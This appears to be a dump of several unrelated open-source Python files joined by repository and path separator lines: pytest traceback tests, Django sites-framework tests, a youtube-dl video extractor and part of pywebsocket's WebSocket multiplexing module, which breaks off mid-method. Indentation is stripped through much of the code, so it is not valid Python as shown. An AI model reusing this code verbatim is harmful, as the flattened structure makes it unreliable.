def test_toterminal_long_filenames(self, importasmod):
mod = importasmod("""
def f():
raise ValueError()
""")
excinfo = pytest.raises(ValueError, mod.f)
tw = TWMock()
path = py.path.local(mod.__file__)
old = path.dirpath().chdir()
try:
repr = excinfo.getrepr(abspath=False)
repr.toterminal(tw)
line = tw.lines[-1]
x = py.path.local().bestrelpath(path)
if len(x) < len(str(path)):
assert line == "mod.py:3: ValueError"
repr = excinfo.getrepr(abspath=True)
repr.toterminal(tw)
line = tw.lines[-1]
assert line == "%s:3: ValueError" %(path,)
finally:
old.chdir()
@pytest.mark.parametrize('reproptions', [
{'style': style, 'showlocals': showlocals,
'funcargs': funcargs, 'tbfilter': tbfilter
} for style in ("long", "short", "no")
for showlocals in (True, False)
for tbfilter in (True, False)
for funcargs in (True, False)])
def test_format_excinfo(self, importasmod, reproptions):
mod = importasmod("""
def g(x):
raise ValueError(x)
def f():
g(3)
""")
excinfo = pytest.raises(ValueError, mod.f)
tw = py.io.TerminalWriter(stringio=True)
repr = excinfo.getrepr(**reproptions)
repr.toterminal(tw)
assert tw.stringio.getvalue()
def test_native_style(self):
excinfo = self.excinfo_from_exec("""
assert 0
""")
repr = excinfo.getrepr(style='native')
assert "assert 0" in str(repr.reprcrash)
s = str(repr)
assert s.startswith('Traceback (most recent call last):\n File')
assert s.endswith('\nAssertionError: assert 0')
assert 'exec (source.compile())' in s
# python 2.4 fails to get the source line for the assert
if py.std.sys.version_info >= (2, 5):
assert s.count('assert 0') == 2
def test_traceback_repr_style(self, importasmod):
mod = importasmod("""
def f():
g()
def g():
h()
def h():
i()
def i():
raise ValueError()
""")
excinfo = pytest.raises(ValueError, mod.f)
excinfo.traceback = excinfo.traceback.filter()
excinfo.traceback[1].set_repr_style("short")
excinfo.traceback[2].set_repr_style("short")
r = excinfo.getrepr(style="long")
tw = TWMock()
r.toterminal(tw)
        for line in tw.lines:
            print(line)
assert tw.lines[0] == ""
assert tw.lines[1] == " def f():"
assert tw.lines[2] == "> g()"
assert tw.lines[3] == ""
assert tw.lines[4].endswith("mod.py:3: ")
assert tw.lines[5] == ("_ ", None)
assert tw.lines[6].endswith("in g")
assert tw.lines[7] == " h()"
assert tw.lines[8].endswith("in h")
assert tw.lines[9] == " i()"
assert tw.lines[10] == ("_ ", None)
assert tw.lines[11] == ""
assert tw.lines[12] == " def i():"
assert tw.lines[13] == "> raise ValueError()"
assert tw.lines[14] == "E ValueError"
assert tw.lines[15] == ""
assert tw.lines[16].endswith("mod.py:9: ValueError")
|
rhertzog/django | refs/heads/master | tests/sites_tests/tests.py | 16 | from __future__ import unicode_literals
from django.apps import apps
from django.apps.registry import Apps
from django.conf import settings
from django.contrib.sites import models
from django.contrib.sites.management import create_default_site
from django.contrib.sites.middleware import CurrentSiteMiddleware
from django.contrib.sites.models import Site, clear_site_cache
from django.contrib.sites.requests import RequestSite
from django.contrib.sites.shortcuts import get_current_site
from django.core.exceptions import ObjectDoesNotExist, ValidationError
from django.db.models.signals import post_migrate
from django.http import HttpRequest, HttpResponse
from django.test import TestCase, modify_settings, override_settings
from django.test.utils import captured_stdout
@modify_settings(INSTALLED_APPS={'append': 'django.contrib.sites'})
class SitesFrameworkTests(TestCase):
multi_db = True
def setUp(self):
self.site = Site(
id=settings.SITE_ID,
domain="example.com",
name="example.com",
)
self.site.save()
def tearDown(self):
Site.objects.clear_cache()
def test_site_manager(self):
# Make sure that get_current() does not return a deleted Site object.
s = Site.objects.get_current()
self.assertIsInstance(s, Site)
s.delete()
with self.assertRaises(ObjectDoesNotExist):
Site.objects.get_current()
def test_site_cache(self):
# After updating a Site object (e.g. via the admin), we shouldn't return a
# bogus value from the SITE_CACHE.
site = Site.objects.get_current()
self.assertEqual("example.com", site.name)
s2 = Site.objects.get(id=settings.SITE_ID)
s2.name = "Example site"
s2.save()
site = Site.objects.get_current()
self.assertEqual("Example site", site.name)
def test_delete_all_sites_clears_cache(self):
# When all site objects are deleted the cache should also
# be cleared and get_current() should raise a DoesNotExist.
self.assertIsInstance(Site.objects.get_current(), Site)
Site.objects.all().delete()
with self.assertRaises(Site.DoesNotExist):
Site.objects.get_current()
@override_settings(ALLOWED_HOSTS=['example.com'])
def test_get_current_site(self):
# Test that the correct Site object is returned
request = HttpRequest()
request.META = {
"SERVER_NAME": "example.com",
"SERVER_PORT": "80",
}
site = get_current_site(request)
self.assertIsInstance(site, Site)
self.assertEqual(site.id, settings.SITE_ID)
# Test that an exception is raised if the sites framework is installed
# but there is no matching Site
site.delete()
with self.assertRaises(ObjectDoesNotExist):
get_current_site(request)
# A RequestSite is returned if the sites framework is not installed
with self.modify_settings(INSTALLED_APPS={'remove': 'django.contrib.sites'}):
site = get_current_site(request)
self.assertIsInstance(site, RequestSite)
self.assertEqual(site.name, "example.com")
@override_settings(SITE_ID='', ALLOWED_HOSTS=['example.com'])
def test_get_current_site_no_site_id(self):
request = HttpRequest()
request.META = {
"SERVER_NAME": "example.com",
"SERVER_PORT": "80",
}
del settings.SITE_ID
site = get_current_site(request)
self.assertEqual(site.name, "example.com")
@override_settings(SITE_ID='', ALLOWED_HOSTS=['example.com', 'example.net'])
def test_get_current_site_no_site_id_and_handle_port_fallback(self):
request = HttpRequest()
s1 = self.site
s2 = Site.objects.create(domain='example.com:80', name='example.com:80')
# Host header without port
request.META = {'HTTP_HOST': 'example.com'}
site = get_current_site(request)
self.assertEqual(site, s1)
# Host header with port - match, no fallback without port
request.META = {'HTTP_HOST': 'example.com:80'}
site = get_current_site(request)
self.assertEqual(site, s2)
# Host header with port - no match, fallback without port
request.META = {'HTTP_HOST': 'example.com:81'}
site = get_current_site(request)
self.assertEqual(site, s1)
# Host header with non-matching domain
request.META = {'HTTP_HOST': 'example.net'}
with self.assertRaises(ObjectDoesNotExist):
get_current_site(request)
# Ensure domain for RequestSite always matches host header
with self.modify_settings(INSTALLED_APPS={'remove': 'django.contrib.sites'}):
request.META = {'HTTP_HOST': 'example.com'}
site = get_current_site(request)
self.assertEqual(site.name, 'example.com')
request.META = {'HTTP_HOST': 'example.com:80'}
site = get_current_site(request)
self.assertEqual(site.name, 'example.com:80')
def test_domain_name_with_whitespaces(self):
# Regression for #17320
        # Domain names are not allowed to contain whitespace characters
site = Site(name="test name", domain="test test")
with self.assertRaises(ValidationError):
site.full_clean()
site.domain = "test\ttest"
with self.assertRaises(ValidationError):
site.full_clean()
site.domain = "test\ntest"
with self.assertRaises(ValidationError):
site.full_clean()
@override_settings(ALLOWED_HOSTS=['example.com'])
def test_clear_site_cache(self):
request = HttpRequest()
request.META = {
"SERVER_NAME": "example.com",
"SERVER_PORT": "80",
}
self.assertEqual(models.SITE_CACHE, {})
get_current_site(request)
expected_cache = {self.site.id: self.site}
self.assertEqual(models.SITE_CACHE, expected_cache)
with self.settings(SITE_ID=''):
get_current_site(request)
expected_cache.update({self.site.domain: self.site})
self.assertEqual(models.SITE_CACHE, expected_cache)
clear_site_cache(Site, instance=self.site, using='default')
self.assertEqual(models.SITE_CACHE, {})
@override_settings(SITE_ID='', ALLOWED_HOSTS=['example2.com'])
def test_clear_site_cache_domain(self):
site = Site.objects.create(name='example2.com', domain='example2.com')
request = HttpRequest()
request.META = {
"SERVER_NAME": "example2.com",
"SERVER_PORT": "80",
}
get_current_site(request) # prime the models.SITE_CACHE
expected_cache = {site.domain: site}
self.assertEqual(models.SITE_CACHE, expected_cache)
# Site exists in 'default' database so using='other' shouldn't clear.
clear_site_cache(Site, instance=site, using='other')
self.assertEqual(models.SITE_CACHE, expected_cache)
# using='default' should clear.
clear_site_cache(Site, instance=site, using='default')
self.assertEqual(models.SITE_CACHE, {})
def test_unique_domain(self):
site = Site(domain=self.site.domain)
msg = 'Site with this Domain name already exists.'
with self.assertRaisesMessage(ValidationError, msg):
site.validate_unique()
def test_site_natural_key(self):
self.assertEqual(Site.objects.get_by_natural_key(self.site.domain), self.site)
self.assertEqual(self.site.natural_key(), (self.site.domain,))
@override_settings(ALLOWED_HOSTS=['example.com'])
def test_requestsite_save_notimplemented_msg(self):
# Test response msg for RequestSite.save NotImplementedError
request = HttpRequest()
request.META = {
"HTTP_HOST": "example.com",
}
msg = 'RequestSite cannot be saved.'
with self.assertRaisesMessage(NotImplementedError, msg):
RequestSite(request).save()
@override_settings(ALLOWED_HOSTS=['example.com'])
def test_requestsite_delete_notimplemented_msg(self):
# Test response msg for RequestSite.delete NotImplementedError
request = HttpRequest()
request.META = {
"HTTP_HOST": "example.com",
}
msg = 'RequestSite cannot be deleted.'
with self.assertRaisesMessage(NotImplementedError, msg):
RequestSite(request).delete()
class JustOtherRouter(object):
def allow_migrate(self, db, app_label, **hints):
return db == 'other'
@modify_settings(INSTALLED_APPS={'append': 'django.contrib.sites'})
class CreateDefaultSiteTests(TestCase):
multi_db = True
def setUp(self):
self.app_config = apps.get_app_config('sites')
# Delete the site created as part of the default migration process.
Site.objects.all().delete()
def test_basic(self):
"""
#15346, #15573 - create_default_site() creates an example site only if
none exist.
"""
with captured_stdout() as stdout:
create_default_site(self.app_config)
self.assertEqual(Site.objects.count(), 1)
self.assertIn("Creating example.com", stdout.getvalue())
with captured_stdout() as stdout:
create_default_site(self.app_config)
self.assertEqual(Site.objects.count(), 1)
self.assertEqual("", stdout.getvalue())
@override_settings(DATABASE_ROUTERS=[JustOtherRouter()])
def test_multi_db_with_router(self):
"""
#16353, #16828 - The default site creation should respect db routing.
"""
create_default_site(self.app_config, using='default', verbosity=0)
create_default_site(self.app_config, using='other', verbosity=0)
self.assertFalse(Site.objects.using('default').exists())
self.assertTrue(Site.objects.using('other').exists())
def test_multi_db(self):
create_default_site(self.app_config, using='default', verbosity=0)
create_default_site(self.app_config, using='other', verbosity=0)
self.assertTrue(Site.objects.using('default').exists())
self.assertTrue(Site.objects.using('other').exists())
def test_save_another(self):
"""
#17415 - Another site can be created right after the default one.
On some backends the sequence needs to be reset after saving with an
        explicit ID. Test that there isn't a sequence collision by saving
another site. This test is only meaningful with databases that use
sequences for automatic primary keys such as PostgreSQL and Oracle.
"""
create_default_site(self.app_config, verbosity=0)
Site(domain='example2.com', name='example2.com').save()
def test_signal(self):
"""
#23641 - Sending the ``post_migrate`` signal triggers creation of the
default site.
"""
post_migrate.send(sender=self.app_config, app_config=self.app_config, verbosity=0)
self.assertTrue(Site.objects.exists())
@override_settings(SITE_ID=35696)
def test_custom_site_id(self):
"""
#23945 - The configured ``SITE_ID`` should be respected.
"""
create_default_site(self.app_config, verbosity=0)
self.assertEqual(Site.objects.get().pk, 35696)
@override_settings() # Restore original ``SITE_ID`` afterwards.
def test_no_site_id(self):
"""
#24488 - The pk should default to 1 if no ``SITE_ID`` is configured.
"""
del settings.SITE_ID
create_default_site(self.app_config, verbosity=0)
self.assertEqual(Site.objects.get().pk, 1)
def test_unavailable_site_model(self):
"""
#24075 - A Site shouldn't be created if the model isn't available.
"""
apps = Apps()
create_default_site(self.app_config, verbosity=0, apps=apps)
self.assertFalse(Site.objects.exists())
class MiddlewareTest(TestCase):
def test_old_style_request(self):
""" Makes sure that the request has correct `site` attribute. """
middleware = CurrentSiteMiddleware()
request = HttpRequest()
middleware.process_request(request)
self.assertEqual(request.site.id, settings.SITE_ID)
def test_request(self):
def get_response(request):
return HttpResponse(str(request.site.id))
response = CurrentSiteMiddleware(get_response)(HttpRequest())
self.assertContains(response, settings.SITE_ID)
|
janusnic/youtube-dl-GUI | refs/heads/master | youtube_dl/extractor/wayofthemaster.py | 154 | from __future__ import unicode_literals
import re
from .common import InfoExtractor
class WayOfTheMasterIE(InfoExtractor):
_VALID_URL = r'https?://www\.wayofthemaster\.com/([^/?#]*/)*(?P<id>[^/?#]+)\.s?html(?:$|[?#])'
_TEST = {
'url': 'http://www.wayofthemaster.com/hbks.shtml',
'md5': '5316b57487ada8480606a93cb3d18d24',
'info_dict': {
'id': 'hbks',
'ext': 'mp4',
'title': 'Intelligent Design vs. Evolution',
},
}
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
video_id = mobj.group('id')
webpage = self._download_webpage(url, video_id)
title = self._search_regex(
r'<img src="images/title_[^"]+".*?alt="([^"]+)"',
webpage, 'title', default=None)
if title is None:
title = self._html_search_regex(
r'<title>(.*?)</title>', webpage, 'page title')
url_base = self._search_regex(
r'<param\s+name="?movie"?\s+value=".*?/wotm_videoplayer_highlow[0-9]*\.swf\?vid=([^"]+)"',
webpage, 'URL base')
formats = [{
'format_id': 'low',
'quality': 1,
'url': url_base + '_low.mp4',
}, {
'format_id': 'high',
'quality': 2,
'url': url_base + '_high.mp4',
}]
self._sort_formats(formats)
return {
'id': video_id,
'title': title,
'formats': formats,
}
|
rohlandm/servo | refs/heads/master | tests/wpt/css-tests/tools/pywebsocket/src/mod_pywebsocket/mux.py | 636 | # Copyright 2012, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""This file provides classes and helper functions for multiplexing extension.
Specification:
http://tools.ietf.org/html/draft-ietf-hybi-websocket-multiplexing-06
"""
import collections
import copy
import email
import email.parser
import logging
import math
import struct
import threading
import traceback
from mod_pywebsocket import common
from mod_pywebsocket import handshake
from mod_pywebsocket import util
from mod_pywebsocket._stream_base import BadOperationException
from mod_pywebsocket._stream_base import ConnectionTerminatedException
from mod_pywebsocket._stream_base import InvalidFrameException
from mod_pywebsocket._stream_hybi import Frame
from mod_pywebsocket._stream_hybi import Stream
from mod_pywebsocket._stream_hybi import StreamOptions
from mod_pywebsocket._stream_hybi import create_binary_frame
from mod_pywebsocket._stream_hybi import create_closing_handshake_body
from mod_pywebsocket._stream_hybi import create_header
from mod_pywebsocket._stream_hybi import create_length_header
from mod_pywebsocket._stream_hybi import parse_frame
from mod_pywebsocket.handshake import hybi
_CONTROL_CHANNEL_ID = 0
_DEFAULT_CHANNEL_ID = 1
_MUX_OPCODE_ADD_CHANNEL_REQUEST = 0
_MUX_OPCODE_ADD_CHANNEL_RESPONSE = 1
_MUX_OPCODE_FLOW_CONTROL = 2
_MUX_OPCODE_DROP_CHANNEL = 3
_MUX_OPCODE_NEW_CHANNEL_SLOT = 4
_MAX_CHANNEL_ID = 2 ** 29 - 1
_INITIAL_NUMBER_OF_CHANNEL_SLOTS = 64
_INITIAL_QUOTA_FOR_CLIENT = 8 * 1024
_HANDSHAKE_ENCODING_IDENTITY = 0
_HANDSHAKE_ENCODING_DELTA = 1
# We need only these status code for now.
_HTTP_BAD_RESPONSE_MESSAGES = {
common.HTTP_STATUS_BAD_REQUEST: 'Bad Request',
}
# DropChannel reason code
# TODO(bashi): Define all reason codes defined in the -05 draft.
_DROP_CODE_NORMAL_CLOSURE = 1000
_DROP_CODE_INVALID_ENCAPSULATING_MESSAGE = 2001
_DROP_CODE_CHANNEL_ID_TRUNCATED = 2002
_DROP_CODE_ENCAPSULATED_FRAME_IS_TRUNCATED = 2003
_DROP_CODE_UNKNOWN_MUX_OPCODE = 2004
_DROP_CODE_INVALID_MUX_CONTROL_BLOCK = 2005
_DROP_CODE_CHANNEL_ALREADY_EXISTS = 2006
_DROP_CODE_NEW_CHANNEL_SLOT_VIOLATION = 2007
_DROP_CODE_UNKNOWN_REQUEST_ENCODING = 2010
_DROP_CODE_SEND_QUOTA_VIOLATION = 3005
_DROP_CODE_SEND_QUOTA_OVERFLOW = 3006
_DROP_CODE_ACKNOWLEDGED = 3008
_DROP_CODE_BAD_FRAGMENTATION = 3009
class MuxUnexpectedException(Exception):
"""Exception in handling multiplexing extension."""
pass
# Temporary
class MuxNotImplementedException(Exception):
"""Raised when a flow enters unimplemented code path."""
pass
class LogicalConnectionClosedException(Exception):
"""Raised when logical connection is gracefully closed."""
pass
class PhysicalConnectionError(Exception):
"""Raised when there is a physical connection error."""
def __init__(self, drop_code, message=''):
super(PhysicalConnectionError, self).__init__(
'code=%d, message=%r' % (drop_code, message))
self.drop_code = drop_code
self.message = message
class LogicalChannelError(Exception):
"""Raised when there is a logical channel error."""
def __init__(self, channel_id, drop_code, message=''):
super(LogicalChannelError, self).__init__(
'channel_id=%d, code=%d, message=%r' % (
channel_id, drop_code, message))
self.channel_id = channel_id
self.drop_code = drop_code
self.message = message
def _encode_channel_id(channel_id):
if channel_id < 0:
raise ValueError('Channel id %d must not be negative' % channel_id)
if channel_id < 2 ** 7:
return chr(channel_id)
if channel_id < 2 ** 14:
return struct.pack('!H', 0x8000 + channel_id)
if channel_id < 2 ** 21:
first = chr(0xc0 + (channel_id >> 16))
return first + struct.pack('!H', channel_id & 0xffff)
if channel_id < 2 ** 29:
return struct.pack('!L', 0xe0000000 + channel_id)
raise ValueError('Channel id %d is too large' % channel_id)
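# A hedged illustration of the encodings produced above; the byte values
# follow from the arithmetic in _encode_channel_id and are meant as a
# reading aid, not as normative examples from the spec:
#   _encode_channel_id(5)       == '\x05'              # 1 byte, id < 2**7
#   _encode_channel_id(300)     == '\x81\x2c'          # 2 bytes, 0x8000 + id
#   _encode_channel_id(100000)  == '\xc1\x86\xa0'      # 3 bytes, 0xc0-prefixed
#   _encode_channel_id(2 ** 28) == '\xf0\x00\x00\x00'  # 4 bytes, 0xe0000000 + id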
def _encode_number(number):
return create_length_header(number, False)
def _create_add_channel_response(channel_id, encoded_handshake,
encoding=0, rejected=False):
if encoding != 0 and encoding != 1:
raise ValueError('Invalid encoding %d' % encoding)
first_byte = ((_MUX_OPCODE_ADD_CHANNEL_RESPONSE << 5) |
(rejected << 4) | encoding)
block = (chr(first_byte) +
_encode_channel_id(channel_id) +
_encode_number(len(encoded_handshake)) +
encoded_handshake)
return block
def _create_drop_channel(channel_id, code=None, message=''):
if len(message) > 0 and code is None:
raise ValueError('Code must be specified if message is specified')
first_byte = _MUX_OPCODE_DROP_CHANNEL << 5
block = chr(first_byte) + _encode_channel_id(channel_id)
if code is None:
block += _encode_number(0) # Reason size
else:
reason = struct.pack('!H', code) + message
reason_size = _encode_number(len(reason))
block += reason_size + reason
return block
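# For illustration (derived from the code above, not quoted from the spec):
# a DropChannel for channel 2 with code 1000 and message 'bye' serializes as
#   _create_drop_channel(2, 1000, 'bye')
#   == '\x60'      (opcode _MUX_OPCODE_DROP_CHANNEL << 5)
#    + '\x02'      (channel id 2)
#    + '\x05'      (reason size: 2-byte code + 3-byte message)
#    + '\x03\xe8'  (code 1000)
#    + 'bye'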
def _create_flow_control(channel_id, replenished_quota):
first_byte = _MUX_OPCODE_FLOW_CONTROL << 5
block = (chr(first_byte) +
_encode_channel_id(channel_id) +
_encode_number(replenished_quota))
return block
def _create_new_channel_slot(slots, send_quota):
if slots < 0 or send_quota < 0:
raise ValueError('slots and send_quota must be non-negative.')
first_byte = _MUX_OPCODE_NEW_CHANNEL_SLOT << 5
block = (chr(first_byte) +
_encode_number(slots) +
_encode_number(send_quota))
return block
def _create_fallback_new_channel_slot():
first_byte = (_MUX_OPCODE_NEW_CHANNEL_SLOT << 5) | 1 # Set the F flag
block = (chr(first_byte) + _encode_number(0) + _encode_number(0))
return block
def _parse_request_text(request_text):
request_line, header_lines = request_text.split('\r\n', 1)
words = request_line.split(' ')
if len(words) != 3:
raise ValueError('Bad Request-Line syntax %r' % request_line)
[command, path, version] = words
if version != 'HTTP/1.1':
raise ValueError('Bad request version %r' % version)
# email.parser.Parser() parses RFC 2822 (RFC 822) style headers.
# RFC 6455 refers RFC 2616 for handshake parsing, and RFC 2616 refers
# RFC 822.
headers = email.parser.Parser().parsestr(header_lines)
return command, path, version, headers
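# A minimal usage sketch with a hypothetical handshake request:
#   command, path, version, headers = _parse_request_text(
#       'GET /chat HTTP/1.1\r\n'
#       'Host: example.com\r\n'
#       'Upgrade: websocket\r\n'
#       '\r\n')
#   # command == 'GET', path == '/chat', version == 'HTTP/1.1'
#   # headers['Host'] == 'example.com'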
class _ControlBlock(object):
"""A structure that holds parsing result of multiplexing control block.
Control block specific attributes will be added by _MuxFramePayloadParser.
(e.g. encoded_handshake will be added for AddChannelRequest and
AddChannelResponse)
"""
def __init__(self, opcode):
self.opcode = opcode
class _MuxFramePayloadParser(object):
"""A class that parses multiplexed frame payload."""
def __init__(self, payload):
self._data = payload
self._read_position = 0
self._logger = util.get_class_logger(self)
def read_channel_id(self):
"""Reads channel id.
Raises:
ValueError: when the payload doesn't contain
valid channel id.
"""
remaining_length = len(self._data) - self._read_position
pos = self._read_position
if remaining_length == 0:
raise ValueError('Invalid channel id format')
channel_id = ord(self._data[pos])
channel_id_length = 1
if channel_id & 0xe0 == 0xe0:
if remaining_length < 4:
raise ValueError('Invalid channel id format')
channel_id = struct.unpack('!L',
self._data[pos:pos+4])[0] & 0x1fffffff
channel_id_length = 4
elif channel_id & 0xc0 == 0xc0:
if remaining_length < 3:
raise ValueError('Invalid channel id format')
channel_id = (((channel_id & 0x1f) << 16) +
struct.unpack('!H', self._data[pos+1:pos+3])[0])
channel_id_length = 3
elif channel_id & 0x80 == 0x80:
if remaining_length < 2:
raise ValueError('Invalid channel id format')
channel_id = struct.unpack('!H',
self._data[pos:pos+2])[0] & 0x3fff
channel_id_length = 2
self._read_position += channel_id_length
return channel_id
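    # Reading aid (derived from the bit masks above): the accepted formats
    # mirror _encode_channel_id. A leading 0 bit means a 1-byte id (7 bits),
    # 10 a 2-byte id (14 bits), 110 a 3-byte id (21 bits), and 111 a 4-byte
    # id (29 bits).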
def read_inner_frame(self):
"""Reads an inner frame.
Raises:
PhysicalConnectionError: when the inner frame is invalid.
"""
if len(self._data) == self._read_position:
raise PhysicalConnectionError(
_DROP_CODE_ENCAPSULATED_FRAME_IS_TRUNCATED)
bits = ord(self._data[self._read_position])
self._read_position += 1
fin = (bits & 0x80) == 0x80
rsv1 = (bits & 0x40) == 0x40
rsv2 = (bits & 0x20) == 0x20
rsv3 = (bits & 0x10) == 0x10
opcode = bits & 0xf
payload = self.remaining_data()
# Consume rest of the message which is payload data of the original
# frame.
self._read_position = len(self._data)
return fin, rsv1, rsv2, rsv3, opcode, payload
def _read_number(self):
if self._read_position + 1 > len(self._data):
raise ValueError(
'Cannot read the first byte of number field')
number = ord(self._data[self._read_position])
if number & 0x80 == 0x80:
raise ValueError(
'The most significant bit of the first byte of number should '
'be unset')
self._read_position += 1
pos = self._read_position
if number == 127:
if pos + 8 > len(self._data):
raise ValueError('Invalid number field')
self._read_position += 8
number = struct.unpack('!Q', self._data[pos:pos+8])[0]
if number > 0x7FFFFFFFFFFFFFFF:
raise ValueError('Encoded number(%d) >= 2^63' % number)
if number <= 0xFFFF:
raise ValueError(
                    '%d should not be encoded by 9-byte encoding' % number)
return number
if number == 126:
if pos + 2 > len(self._data):
raise ValueError('Invalid number field')
self._read_position += 2
number = struct.unpack('!H', self._data[pos:pos+2])[0]
if number <= 125:
raise ValueError(
                    '%d should not be encoded by 3-byte encoding' % number)
return number
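    # Reading aid: the encoding parsed above mirrors WebSocket payload
    # lengths without the mask bit.
    #   0..125            one byte holding the value itself
    #   126..0xFFFF       '\x7e' followed by a 2-byte big-endian value
    #   0x10000..2**63-1  '\x7f' followed by an 8-byte big-endian value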
def _read_size_and_contents(self):
"""Reads data that consists of followings:
- the size of the contents encoded the same way as payload length
of the WebSocket Protocol with 1 bit padding at the head.
- the contents.
"""
try:
size = self._read_number()
except ValueError, e:
raise PhysicalConnectionError(_DROP_CODE_INVALID_MUX_CONTROL_BLOCK,
str(e))
pos = self._read_position
if pos + size > len(self._data):
raise PhysicalConnectionError(
_DROP_CODE_INVALID_MUX_CONTROL_BLOCK,
'Cannot read %d bytes data' % size)
self._read_position += size
return self._data[pos:pos+size]
def _read_add_channel_request(self, first_byte, control_block):
reserved = (first_byte >> 2) & 0x7
if reserved != 0:
raise PhysicalConnectionError(
_DROP_CODE_INVALID_MUX_CONTROL_BLOCK,
'Reserved bits must be unset')
# Invalid encoding will be handled by MuxHandler.
encoding = first_byte & 0x3
try:
control_block.channel_id = self.read_channel_id()
except ValueError, e:
raise PhysicalConnectionError(_DROP_CODE_INVALID_MUX_CONTROL_BLOCK)
control_block.encoding = encoding
encoded_handshake = self._read_size_and_contents()
control_block.encoded_handshake = encoded_handshake
return control_block
def _read_add_channel_response(self, first_byte, control_block):
reserved = (first_byte >> 2) & 0x3
if reserved != 0:
raise PhysicalConnectionError(
_DROP_CODE_INVALID_MUX_CONTROL_BLOCK,
'Reserved bits must be unset')
control_block.accepted = (first_byte >> 4) & 1
control_block.encoding = first_byte & 0x3
try:
control_block.channel_id = self.read_channel_id()
except ValueError, e:
raise PhysicalConnectionError(_DROP_CODE_INVALID_MUX_CONTROL_BLOCK)
control_block.encoded_handshake = self._read_size_and_contents()
return control_block
def _read_flow_control(self, first_byte, control_block):
reserved = first_byte & 0x1f
if reserved != 0:
raise PhysicalConnectionError(
_DROP_CODE_INVALID_MUX_CONTROL_BLOCK,
'Reserved bits must be unset')
try:
control_block.channel_id = self.read_channel_id()
control_block.send_quota = self._read_number()
except ValueError, e:
raise PhysicalConnectionError(_DROP_CODE_INVALID_MUX_CONTROL_BLOCK,
str(e))
return control_block
def _read_drop_channel(self, first_byte, control_block):
reserved = first_byte & 0x1f
if reserved != 0:
raise PhysicalConnectionError(
_DROP_CODE_INVALID_MUX_CONTROL_BLOCK,
'Reserved bits must be unset')
try:
control_block.channel_id = self.read_channel_id()
except ValueError, e:
raise PhysicalConnectionError(_DROP_CODE_INVALID_MUX_CONTROL_BLOCK)
reason = self._read_size_and_contents()
if len(reason) == 0:
control_block.drop_code = None
control_block.drop_message = ''
elif len(reason) >= 2:
control_block.drop_code = struct.unpack('!H', reason[:2])[0]
control_block.drop_message = reason[2:]
else:
raise PhysicalConnectionError(
_DROP_CODE_INVALID_MUX_CONTROL_BLOCK,
                'Received DropChannel that contains only a 1-byte reason')
return control_block
def _read_new_channel_slot(self, first_byte, control_block):
reserved = first_byte & 0x1e
if reserved != 0:
raise PhysicalConnectionError(
_DROP_CODE_INVALID_MUX_CONTROL_BLOCK,
'Reserved bits must be unset')
control_block.fallback = first_byte & 1
try:
control_block.slots = self._read_number()
control_block.send_quota = self._read_number()
except ValueError, e:
raise PhysicalConnectionError(_DROP_CODE_INVALID_MUX_CONTROL_BLOCK,
str(e))
return control_block
def read_control_blocks(self):
"""Reads control block(s).
Raises:
PhysicalConnectionError: when the payload contains invalid control
block(s).
StopIteration: when no control blocks left.
"""
while self._read_position < len(self._data):
first_byte = ord(self._data[self._read_position])
self._read_position += 1
opcode = (first_byte >> 5) & 0x7
control_block = _ControlBlock(opcode=opcode)
if opcode == _MUX_OPCODE_ADD_CHANNEL_REQUEST:
yield self._read_add_channel_request(first_byte, control_block)
elif opcode == _MUX_OPCODE_ADD_CHANNEL_RESPONSE:
yield self._read_add_channel_response(
first_byte, control_block)
elif opcode == _MUX_OPCODE_FLOW_CONTROL:
yield self._read_flow_control(first_byte, control_block)
elif opcode == _MUX_OPCODE_DROP_CHANNEL:
yield self._read_drop_channel(first_byte, control_block)
elif opcode == _MUX_OPCODE_NEW_CHANNEL_SLOT:
yield self._read_new_channel_slot(first_byte, control_block)
else:
raise PhysicalConnectionError(
_DROP_CODE_UNKNOWN_MUX_OPCODE,
'Invalid opcode %d' % opcode)
assert self._read_position == len(self._data)
raise StopIteration
def remaining_data(self):
"""Returns remaining data."""
return self._data[self._read_position:]
class _LogicalRequest(object):
"""Mimics mod_python request."""
def __init__(self, channel_id, command, path, protocol, headers,
connection):
"""Constructs an instance.
Args:
channel_id: the channel id of the logical channel.
command: HTTP request command.
path: HTTP request path.
headers: HTTP headers.
connection: _LogicalConnection instance.
"""
self.channel_id = channel_id
self.method = command
self.uri = path
self.protocol = protocol
self.headers_in = headers
self.connection = connection
self.server_terminated = False
self.client_terminated = False
def is_https(self):
"""Mimics request.is_https(). Returns False because this method is
used only by old protocols (hixie and hybi00).
"""
return False
class _LogicalConnection(object):
"""Mimics mod_python mp_conn."""
# For details, see the comment of set_read_state().
STATE_ACTIVE = 1
STATE_GRACEFULLY_CLOSED = 2
STATE_TERMINATED = 3
def __init__(self, mux_handler, channel_id):
"""Constructs an instance.
Args:
mux_handler: _MuxHandler instance.
channel_id: channel id of this connection.
"""
self._mux_handler = mux_handler
self._channel_id = channel_id
self._incoming_data = ''
# - Protects _waiting_write_completion
# - Signals the thread waiting for completion of write by mux handler
self._write_condition = threading.Condition()
self._waiting_write_completion = False
self._read_condition = threading.Condition()
self._read_state = self.STATE_ACTIVE
def get_local_addr(self):
